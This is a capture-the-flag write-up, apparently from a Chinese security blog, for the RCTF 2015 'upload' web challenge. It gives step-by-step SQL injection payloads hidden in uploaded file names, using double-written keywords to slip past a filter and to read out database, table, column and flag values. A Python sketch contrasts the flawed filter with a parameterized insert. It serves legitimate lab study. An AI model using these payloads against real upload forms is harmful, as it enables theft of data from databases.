XCTF Web upload(RCTF 2015)

Practice:

SQL injection through the uploaded file name

Approach:

Guess the backend INSERT statement:

insert into 表名('filename',...) values('你上传的文件名',...);

The injected statement is constructed as follows:

文件名'+(selselectect conv(substr(hex(database()),1,12),16,10))+'.jpg

After splicing, the SQL statement becomes:
...values('文件名'+(selselectect conv(substr(hex(database()),1,12),16,10))+'.jpg',...);

CONV(n, from_radix, to_radix): converts n from base from_radix to base to_radix

substr(str, start, length): returns length characters of str starting at position start

hex(str): converts str to its hexadecimal representation

Questions and details:

  1. select and from are filtered; bypass by double-writing the keyword (e.g. selselectect)

  2. Why not inject sselectelect database() directly:

    Echo for each injection:

    '+(selselectect dAtabase())+'.jpg => 0

    '+(selecselectt substr(dAtabase(),1,12))+'.jpg => 0

    '+(selecselectt substr(hex(dAtabase()),1,12))+'.jpg => 7765625

    The third payload should echo '7765625f7570', but the output is cut off at the 'f', so conv is needed to output the value in decimal

  3. The length limit in substr: without it the returned value is too large and the system displays it in scientific notation (XX E XXXXX)

Challenge constraints

  1. Letters cannot appear in the echo -> encode as decimal
  2. The statement must still be correctly closed after injection -> guess the statement structure and close it properly
  3. Prevent the echoed data from being so large that the program returns it in scientific notation -> limit the echo length
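To make the filter bypass and the decimal-echo trick concrete from the defender's side, here is a constructed Python model, added here and not the challenge's real source or the original author's code: a one-pass keyword strip plus string splicing, which a double-written keyword survives, next to the parameterized INSERT that removes the problem, and a helper that reverses the conv(substr(hex())) chain back to text. The files table and its column names are assumptions.

```python
import sqlite3  # in-memory stand-in for the challenge's MySQL backend

BLACKLIST = ("select", "from")

def naive_filter(filename: str) -> str:
    """One-pass blacklist strip (assumed model of the challenge's filter).
    Each keyword is removed once, so a double-written keyword such as
    'selselectect' collapses back into 'select' after filtering."""
    for kw in BLACKLIST:
        filename = filename.replace(kw, "")
    return filename

def build_insert_vulnerable(filename: str, uid: str) -> str:
    """Splices the filtered name into the SQL text: a quote in the name
    becomes part of the statement rather than part of the data."""
    name = naive_filter(filename)
    return f"insert into files(filename,uid,uid2) values('{name}','{uid}','{uid}');"

def build_insert_safe(filename: str, uid: str):
    """Parameterized form: the SQL text is fixed, the name is bound as data."""
    return ("insert into files(filename,uid,uid2) values(?,?,?)", (filename, uid, uid))

def store_safely(filename: str, uid: str) -> list:
    """Runs the parameterized insert and returns the stored filenames, so a
    hostile name can be seen landing in the column unchanged."""
    con = sqlite3.connect(":memory:")
    con.execute("create table files(filename text, uid text, uid2 text)")
    con.execute(*build_insert_safe(filename, uid))
    return [row[0] for row in con.execute("select filename from files")]

def decode_echo(echo: int) -> str:
    """Reverses conv(substr(hex(x),start,12),16,10): decimal echo -> hex -> text.
    A leading zero nibble is lost in the decimal form, so re-pad to even length."""
    h = format(echo, "x")
    if len(h) % 2:
        h = "0" + h
    return bytes.fromhex(h).decode("utf-8", errors="replace")

if __name__ == "__main__":
    # Constructed sample in the shape of the page's first payload; no real backend.
    payload = "file_name'+(selselectect conv(substr(hex(database()),1,12),16,10))+'.jpg"
    print(naive_filter(payload))                     # keyword survives the filter
    print(build_insert_vulnerable(payload, "1661"))  # statement text is altered
    print(store_safely(payload, "1661"))             # stored verbatim as data
    print(decode_echo(int("7765625f7570", 16)))      # first 6 chars of web_upload
```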

Steps

Upload a file whose name carries the injection payload, adjusting the substr start position each time until the full name has been read out

1. Database name
file_name' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg
# database name obtained: web_upload

2. Table name
file_name'+(seleselectct+conv(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema = 'web_upload' limit 1,1)),1,12),16,10))+'.jpg
# table name obtained: hello_flag_is_here

3. Column name
file_name'+(seleselectct+conv(substr(hex((selselectect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = 'hello_flag_is_here' limit 1,1)),1,12),16,10))+'.jpg
# column name obtained: i_am_flag

4. Get the data
file_name'+(seleselectct+CONV(substr(hex((seselectlect i_am_flag frfromom hello_flag_is_here limit 0,1)),13,12),16,10))+'.jpg
# flag obtained: !!_@m_Th.e_F!lag

Another approach (simpler, but it takes a leap of intuition):

If the table structure is guessed correctly, this challenge can be solved quickly; the structure below is taken from another writeup:

(filename.jpg,uid,uid)

Statement structure

When a file is uploaded, the site echoes the uid back to us, so first upload a file and get the uid; if the page redirects too quickly, capture the response

We construct the filename so that the statement becomes (filename,'uid','uid'),((database()),'uid','uid')#.jpg ','uid','uid'); with everything after # commented out

After splicing, the statement is (filename,'uid','uid'),((database()),'uid','uid')

The corresponding echo is our uploaded filename and the result of database(), showing the injection succeeded

Steps

We inject so that the statement takes this form; replace uid with the value obtained above

1. Database name
filename','uid','uid'),((database()),'uid','uid')#.jpg
# e.g.: filename','1661','1661'),((database()),'1661','1661')#.jpg

2. Table name
filename','uid','uid'),((selselectect group_concat(table_name) frfromom information_schema.tables where table_schema = 'web_upload'),'uid','uid')#.jpg

3. Column name
filename','uid','uid'),((selselectect group_concat(column_name) frfromom information_schema.columns where table_name = 'hello_flag_is_here'),'uid','uid')#.jpg

4. Get the data
filename','uid','uid'),((selselectect i_am_flag frfromom hello_flag_is_here),'uid','uid')#.jpg

Reference links:

https://www.cnblogs.com/sharpff/p/10728498.html

https://blog.csdn.net/qq_42181428/article/details/89345094#upload_168


Source: www.cnblogs.com/Dozeer/p/10953036.html